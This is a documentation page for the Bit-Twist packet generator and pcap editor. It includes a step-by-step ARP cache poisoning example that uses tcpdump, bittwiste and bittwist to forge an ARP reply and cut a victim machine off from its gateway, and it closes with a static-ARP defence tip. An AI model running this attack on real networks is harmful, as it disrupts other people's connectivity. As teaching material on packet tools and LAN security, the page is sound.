Bit-Twist Manual Pages

Listed below are HTML manual pages converted directly from Bit-Twist man pages.

• bittwist.1 - pcap based ethernet packet generator
• bittwiste.1 - pcap capture file editor

Some descriptions in the manual pages may be irrelevant for Windows system. However, all the described options should work as intended.

Examples

ARP Cache Poisoning

In this example, we will try to break Y's connection from the Internet by poisoning its ARP cache. Tools required in this example are tcpdump, bittwist and bittwiste. X, attacker (FreeBSD) IP = 192.168.1.10, MAC = 00:08:54:36:5E:01 Y, victim (Windows XP) IP = 192.168.1.20, MAC = 00:08:55:64:65:6A Z, gateway (ADSL router modem w/4-port switch) IP = 192.168.1.1, MAC = 00:13:46:76:20:13 [X] | [Z]---[Internet] | [Y]

Following steps are executed from X, unless otherwise stated:

1. Capture a valid ARP packet from the network: # tcpdump -i vr0 -c 1 -w arp-packet.pcap arp This command will capture a single ARP packet and write it into arp-packet.pcap.

2. Optionally, verify the contents of arp-packet.pcap: # tcpdump -xx -n -r arp-packet.pcap This command will print out hex data for the ARP packet in arp-packet.pcap. This is what we have from our arp-packet.pcap, an ARP request packet from X: # tcpdump -xx -n -r arp-packet.pcap reading from file arp-packet.pcap, link-type EN10MB (Ethernet) 15:27:27.350572 arp who-has 192.168.1.1 tell 192.168.1.10 0x0000: ffff ffff ffff 0008 5436 5e01 0806 0001 0x0010: 0800 0604 0001 0008 5436 5e01 c0a8 010a 0x0020: 0000 0000 0000 c0a8 0101 0500 2d00 0001 0x0030: 2b00 0001 b600 5702 2000 0001

3. From the packet above, create a fake ARP reply packet (invalid sender MAC address) destined for Y from Z: # bittwiste -I arp-packet.pcap -O fake-arp.pcap -T arp -o 2 -s 00:00:aa:bb:cc:dd -p 192.168.1.1 -t 00:08:55:64:65:6a -q 192.168.1.20 input file: arp-packet.pcap output file: fake-arp.pcap 1 packets (60 bytes) written Notice that opcode 2 implies ARP reply, hence the -o 2. The sender MAC address is set to 00:00:aa:bb:cc:dd; a non-existent MAC address on the network. Here is the current Y's ARP cache as printed on its command prompt before the attack: C:\>arp -a Interface: 192.168.1.20 --- 0x2 Internet Address Physical Address Type 192.168.1.1 00-13-46-76-20-13 dynamic

4. Send the fake ARP reply packet: # bittwist -i vr0 fake-arp.pcap sending packets through vr0 trace file: fake-arp.pcap 1 packets (60 bytes) sent Elapsed time = 0.000114 seconds Here is the current Y's ARP cache as printed on its command prompt after the attack: C:\>arp -a Interface: 192.168.1.20 --- 0x2 Internet Address Physical Address Type 192.168.1.1 00-00-aa-bb-cc-dd dynamic From now on, Y will try to communicate with the Internet through Z of which to its current knowledge, is located at 00:00:aa:bb:cc:dd; a non-existent MAC address on the network. This will result in Y being unable to locate Z!

We have seen from the example above that it is trivial to launch such a suprisingly simple attack and yet powerful enough to bring down an entire network. Fortunately, ARP poisoning works only within a single LAN and it is easy to protect your network against this attack by using static ARP cache.

Contributed Examples

Josh Horton has created a couple YouTube videos on how to capture, edit and send packets with the help of Bit-Twist. If you are new to Bit-Twist, do check them out at bit-twist: Network Traffic Generator and editor.

Related RFC

• RFC 894 - A Standard for the Transmission of IP Datagrams over Ethernet Networks
• RFC 826 - An Ethernet Address Resolution Protocol
• RFC 792 - Internet Control Message Protocol
• RFC 791 - Internet Protocol
• RFC 793 - Transmission Control Protocol
• RFC 768 - User Datagram Protocol

If you are interested, the complete list of RFCs are available officially from RFC Editor.

Resources

• IBM Redbooks - TCPIP Tutorial and Technical Overview (.pdf 6.02MB)
• Protocol Numbers by IANA
• The Internet Engineering Task Force (IETF) Home Page
• Internet Assigned Numbers Authority (IANA) Home Page
• Internet Society (ISOC)

Related Projects

• Tcpdump tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. It was originally written by Van Jacobson, Craig Leres and Steven McCanne who were, at the time, working in the Lawrence Berkeley Laboratory Network Research Group.
• Windump WinDump is the Windows version of tcpdump, the command line network analyzer for UNIX. WinDump is fully compatible with tcpdump and can be used to watch, diagnose and save to disk network traffic according to various complex rules.
• Wireshark Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
• Nmap Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.
• Scapy Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc.
• Tcpreplay Tcpreplay is a suite of BSD licensed tools written by Aaron Turner for UNIX (and Win32 under Cygwin) operating systems which gives you the ability to use previously captured traffic in libpcap format to test a variety of network devices. It allows you to classify traffic as client or server, rewrite Layer 2, 3 and 4 headers and finally replay the traffic back onto the network and through other devices such as switches, routers, firewalls, NIDS and IPS's. Tcpreplay supports both single and dual NIC modes for testing both sniffing and inline devices.
• Netdude The Network Dump data Displayer and Editor is a framework for inspection, analysis and manipulation of tcpdump trace files. It addresses the need for a toolset that allows easy inspection, modification, and creation of pcap/tcpdump trace files. Netdude builds on any popular UNIX-like OS, such as Linux, the BSDs, or OSX.
• Tomahawk Tomahawk is a command line tool for testing network-based intrusion prevention systems (NIPS). To date, the tools for testing NIPS have been expensive and limited in functionality. They are typically designed for testing other products, such as switches (e.g., SmartBits/ IXIA), server infrastructure (e.g., WebAvalanche), or Firewalls and Intrusion Detection Systems (Firewall Informer or IDS Informer). None of these tools simulate the harsh environment of real networks under attacks. Tomahawk is designed to fill this gap. It can be used to test the throughput and blocking capabilities of network-based intrusion prevention systems (NIPS).
• packETH packETH is a Linux GUI packet generator tool for ethernet. It allows you to create and send any possible packet or sequence of packets on the ethernet.
• Nemesis Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis, is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting. Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets. Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.